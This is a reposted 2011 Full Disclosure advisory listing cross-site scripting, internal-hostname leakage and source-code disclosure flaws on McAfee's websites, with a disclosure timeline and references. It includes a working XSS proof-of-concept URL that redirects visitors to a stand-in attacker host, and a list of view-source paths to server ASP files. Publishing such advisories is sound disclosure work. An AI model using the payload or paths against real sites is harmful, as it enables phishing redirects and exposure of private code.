From - <a href="http://seclists.org/fulldisclosure/2011/Mar/313" rel="nofollow">http://seclists.org/fulldisclosure/2011/Mar/313</a><p>Vulnerabilities in *McAfee.com<p>1. VULNERABILITY DESCRIPTION<p>-> Cross Site Scripting
<a href="http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace(attacker.in)" rel="nofollow">http://download.mcafee.com/products/webhelp/4/1033/#javascri...</a><p>-> Information Disclosure > Internal Hostname:
<a href="http://www.mcafee.com/js/omniture/omniture_profile.js" rel="nofollow">http://www.mcafee.com/js/omniture/omniture_profile.js</a><p><pre><code> ($ ruby host-extract.rb -a</code></pre>
<a href="http://www.mcafee.com/js/omniture/omniture_profile.js" rel="nofollow">http://www.mcafee.com/js/omniture/omniture_profile.js</a>)<p>-> Information Disclosure > Source Code Disclosure:<p><pre><code> view-source:http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp
view-source:http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp
view-source:http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp
view-source:http://download.mcafee.com/clinic/Includes/common.asp
view-source:http://download.mcafee.com/updates/upgrade_patches.asp
view-source:http://download.mcafee.com/updates/common/dat_common.asp
view-source:http://download.mcafee.com/updates/updates.asp
view-source:http://download.mcafee.com/updates/superDat.asp
view-source:http://download.mcafee.com/eval/evaluate2.asp
view-source:http://download.mcafee.com/common/ssi/conditionals.asp
view-source:http://download.mcafee.com/common/ssi/errHandler_soft.asp
view-source:http://download.mcafee.com/common/ssi/variables.asp
view-source:http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp
view-source:http://download.mcafee.com/common/ssi/errHandler.asp
view-source:http://download.mcafee.com/common/ssi/common_subs.asp
view-source:http://download.mcafee.com/us/upgradeCenter/productComparison_top.asp
view-source:http://download.mcafee.com/us/bannerAd.asp
view-source:http://download.mcafee.com/common/ssi/standard/global_foot_us.asp
</code></pre>
2. RECOMMENDATION<p>- Fully utilize Mcafee FoundStone Experts
- Use outbound monitoring of traffic to detect potential information leakage<p>3. VENDOR<p>McAfee Inc
<a href="http://www.mcafee.com" rel="nofollow">http://www.mcafee.com</a><p>4. DISCLOSURE TIME-LINE<p>2011-02-10: reported vendor
2011-02-12: vendor replied "we are working to resolve the issue as
quickly as possible"
2011-03-27: vulnerability found to be unfixed completely
2011-03-27: vulnerability disclosed<p>5. REFERENCES<p>Original Advisory URL:
<a href="http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_infoleak" rel="nofollow">http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafe...</a>
Former Disclosure, 2008:
<a href="http://www.theregister.co.uk/2008/06/13/security_giants_xssed/" rel="nofollow">http://www.theregister.co.uk/2008/06/13/security_giants_xsse...</a>
Former Disclosure, 2009:
<a href="http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks-110667.shtml" rel="nofollow">http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to...</a>
Former Disclosure, 2010:
<a href="http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-defacement.html" rel="nofollow">http://security-sh3ll.blogspot.com/2010/04/mcafee-communitie...</a>
host-extract: <a href="http://code.google.com/p/host-extract/" rel="nofollow">http://code.google.com/p/host-extract/</a>
Demo: <a href="http://yehg.net/lab/pr0js/training/view/misc/XSSing_McAfee_Secured/" rel="nofollow">http://yehg.net/lab/pr0js/training/view/misc/XSSing_McAfee_S...</a>
xssed: <a href="http://www.xssed.com/search?key=mcafee.com" rel="nofollow">http://www.xssed.com/search?key=mcafee.com</a>
Lessont Learn: <a href="http://blogs.mcafee.com/mcafee-labs/from-xss-to-root-lessons-learned-from-a-security-breach" rel="nofollow">http://blogs.mcafee.com/mcafee-labs/from-xss-to-root-lessons...</a><p>#yehg [2011-03-27]